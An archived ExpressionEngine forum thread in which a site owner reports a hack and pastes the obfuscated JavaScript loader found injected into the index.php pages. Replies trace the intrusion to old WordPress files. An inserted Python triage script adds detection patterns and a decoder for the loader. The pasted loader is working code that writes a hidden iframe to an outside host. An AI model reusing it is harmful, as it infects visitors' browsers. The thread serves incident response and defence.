This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

hacked

February 24, 2012 8:05am

  • #1 / Feb 24, 2012 8:05am

    redfred

    141 posts

    I was recently hacked using 2.1.4.

    Have updated now so hopefully won’t happen again but was keen to see if anyone else had the same hack, and how it may have happened.

    This code appeared at the top of the index.php pages, inside script tags:

    if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
    f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!64!12!65!65!14!14!7!78!76!58!7!60!60!8!66!71!61!62!81!7!73!65!73!24!76!65!72!80!77!72!73!66!60!22!12!10!13!10!14!17!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!64!12!65!65!14!14!7!78!76!58!7!60!60!8!66!71!61!62!81!7!73!65!73!24!76!65!72!80!77!72!73!66!60!22!12!10!13!10!14!17!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}
    if(aa.indexOf(aaa)!==-1)
    e(s);

     

  • #2 / Feb 24, 2012 8:58am

    sprockets

    24 posts

    Oh man that sucks. Thanks for the heads up.

    Question - are you using /system/ as your main folder name or did you change it? What about “member” or did you change that?

  • #3 / Feb 24, 2012 9:03am

    redfred

    141 posts

    I changed the system folder name.

    I didn’t change “member”. The site only has one (super-admin) member which is me.

  • #4 / Feb 24, 2012 9:16am

    Boyink!

    5011 posts

    Most hacks are as a result of insecure hosting - where is your site located?

  • #5 / Feb 24, 2012 9:23am

    redfred

    141 posts

    It’s on 1and1 - not my choice, the client’s.

    Have let them know about the issue and waiting to see what they say.

  • #6 / Feb 24, 2012 5:34pm

    Kevin Smith

    4784 posts

    redfred, I hate to see you experiencing this, but thank you for reporting it. I want you to know that we take security very seriously and will do our best to work with you on figuring out what’s going on. We need to know what other scripts on your account, whether in use or not (phpBB, etc…).

    Also, you’ve already noted that you’re working with the host to determine where the attack came from. This is good since they’ll likely be the best source of information regarding whether the attack came through scripts on another account on the server (a common source with these types of hacks).

    Please check through these files:

    * index.php
    * admin.php
    * system/index.php
    * system/expressionengine/config/config.php

    to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back up the file and remove said code. If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

    You may also wish to refresh your files by following the update instructions.
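A small triage helper, added here as an example and not part of this thread or of ExpressionEngine itself, that does the file check Kevin Smith describes and also reads the obfuscated loader redfred posted in #1 without executing it. The loader's payload is a `'!'`-separated list of numbers turned back into characters with `fromCharCode(39 + N)` (the `r(39+1*w[j])` in the posted sample), so the decoder below reverses exactly that scheme. The indicator regexes, the `example.invalid` sample body and the `scan_install` file list are the author's assumptions for this example; the real loader is not reproduced, only a constructed one with the same structure and a harmless decoded body.

```python
"""Triage helper for the injected-script symptom described in this thread.

Constructed example: checks the files listed in post #6 for the hallmarks of
the obfuscated loader posted in #1, and decodes that loader's
'N!N!N'.split('!') + fromCharCode(39 + N) scheme so an analyst can read what
it would have eval'd without running it.
"""
import re
from pathlib import Path

# Files named in post #6; a renamed system folder is passed in by the caller.
DEFAULT_FILES = (
    "index.php",
    "admin.php",
    "{system}/index.php",
    "{system}/expressionengine/config/config.php",
)

# Each regex is one hallmark of the loader in #1 (assumed heuristics). None is
# conclusive on its own; two or more in one file is worth a manual look.
INDICATORS = {
    # window['e'+'val'] : eval reached through string fragments
    "split_eval": re.compile(r"window\s*\[\s*'e'\s*\+\s*'val'\s*\]"),
    # 'd'+'o'+'c'+'u'... : a name assembled one or two letters at a time
    "char_concat": re.compile(r"(?:'[A-Za-z]{1,3}'\s*\+\s*){3,}'[A-Za-z]{1,3}'"),
    # String.fromCharCode reached through a concatenated name
    "fromcharcode_concat": re.compile(r"'f'\s*\+\s*'ro'\s*\+\s*'m'\s*\+\s*'Char'"),
    # a long '!'-separated numeric list fed to split('!')
    "bang_payload": re.compile(r"'(?:-?\d{1,3}!){20,}-?\d{1,3}'\s*\.split\(\s*'!'\s*\)"),
    # a hidden or 1px iframe, in the raw file or in a decoded payload
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|width\s*=\s*['\"]?1\d?\b)", re.I
    ),
}

PAYLOAD_RE = re.compile(r"'((?:-?\d{1,3}!)+-?\d{1,3})'\s*\.split\(\s*'!'\s*\)")


def decode_bang_payload(payload: str, offset: int = 39) -> str:
    """Reverse the loader's scheme: each token N becomes chr(offset + N)."""
    return "".join(chr(offset + int(tok)) for tok in payload.split("!"))


def encode_bang_payload(text: str, offset: int = 39) -> str:
    """Inverse of decode_bang_payload; used only to build constructed samples."""
    return "!".join(str(ord(ch) - offset) for ch in text)


def find_indicators(source: str) -> list:
    """Names of every indicator present in the given text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def decoded_payloads(source: str) -> list:
    """Decode every '...'.split('!') payload in source, without executing it."""
    return [decode_bang_payload(m.group(1)) for m in PAYLOAD_RE.finditer(source)]


def triage(source: str) -> dict:
    """Combine indicators from the raw text with those from decoded payloads."""
    hits = set(find_indicators(source))
    decoded = decoded_payloads(source)
    for text in decoded:
        hits.update(find_indicators(text))
    return {"indicators": sorted(hits), "decoded": decoded, "suspicious": len(hits) >= 2}


def scan_install(root: str, system_folder: str = "system") -> dict:
    """Run triage over the post #6 file list under an ExpressionEngine root."""
    results = {}
    for rel in DEFAULT_FILES:
        path = Path(root) / rel.format(system=system_folder)
        if path.is_file():
            results[str(path)] = triage(path.read_text(errors="replace"))
    return results


# Constructed sample: same loader structure as #1, but the decoded body only
# writes a hidden iframe to the reserved example.invalid host.
SAMPLE_BODY = ("document.write('<iframe src=\"http://example.invalid/\" width=\"1\" "
               "height=\"1\" style=\"visibility:hidden\"></iframe>');")
SAMPLE_INJECTION = (
    "<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])"
    "f='" + encode_bang_payload(SAMPLE_BODY) + "'.split('!');"
    "e=window['e'+'val'];fr='f'+'ro'+'m'+'Char';r=String[fr+'Code'];"
    "s='';for(i=0;i<f.length;i++){s=s+r(39+1*f[i]);}e(s);</script>"
)
# Constructed clean front controller for comparison.
CLEAN_INDEX = "<?php\n$system_path = './system';\nrequire $system_path.'/index.php';\n"

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_INDEX), ("injected", SAMPLE_INJECTION)):
        result = triage(text)
        print(label, "suspicious" if result["suspicious"] else "ok", result["indicators"])
```

Point `scan_install("/path/to/site", system_folder="renamed-system")` at a copy of the install rather than the live files; the decoder never evaluates anything, so reading the decoded text is safe, and seeing `document.write` of a hidden iframe in it is the signal to back the file up and restore it from a clean release, as post #6 advises.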

  • #7 / Feb 27, 2012 4:20am

    redfred

    141 posts

    The site uses some Javascript but it’s fairly standard. Do you need any further info?

    It was the two index.php files you mention that both had the same code added to them, didn’t seem to be any other files affected. All seems ok since the update.

  • #8 / Feb 27, 2012 4:44pm

    Shane Eckert

    7174 posts

    Hello redfred,

    I am glad to hear that everything seems okay since the update.

    Do you need anything else? We are here if you have any questions or concerns.

    Cheers,

  • #9 / Feb 28, 2012 4:01am

    redfred

    141 posts

    I would be keen to hear if anybody else had similar issues and if they had found out how it happened.

    The web hosting people haven’t said much.

    Thanks

  • #10 / Feb 28, 2012 10:11am

    Jon Horton

    38 posts

    For what it’s worth, our site was hacked this past weekend too. Some malicious scripts (javascript & php) were inserted into all of our index.php/html, main.php/html, and default.php/html pages. We removed all of the offending code, only to have it come back a few hours later.

    We ultimately found the hack came through an outdated version of Wordpress (2.8.4) installed on our server.  We believe it was an RFI Injection (http://en.wikipedia.org/wiki/Remote_file_inclusion) that came through the comments form.

    I suggest checking other index.php files just to see if they have also been affected, and to make sure all other software on your server is up-to-date!

  • #11 / Feb 28, 2012 5:20pm

    Shane Eckert

    7174 posts

    Hello Jon,

    Thank you for sharing that information.

    Is that helpful redfred?

    Hopefully you can get back in contact with your hosting provider.

    Regards,

  • #12 / Feb 29, 2012 3:55am

    redfred

    141 posts

    Interesting, as the site had been previously built with WP and I hadn’t got round to removing all the old files yet.

    A lesson learnt!

    Thanks

  • #13 / Feb 29, 2012 2:01pm

    Shane Eckert

    7174 posts

    Hello redfred,

    Wow, that is pretty amazing that WP was involved in both cases. So the million dollar question. Are those files gone now? 😊

    Cheers,

  • #14 / Mar 01, 2012 4:01am

    redfred

    141 posts

    Yes, that’s one of the first things I did

  • #15 / Mar 01, 2012 7:51pm

    Sean C. Smith

    3818 posts

    Just to confirm that everyone is fine now - no more problems with the hack? Is there anything else I can assist you with?

    Sean
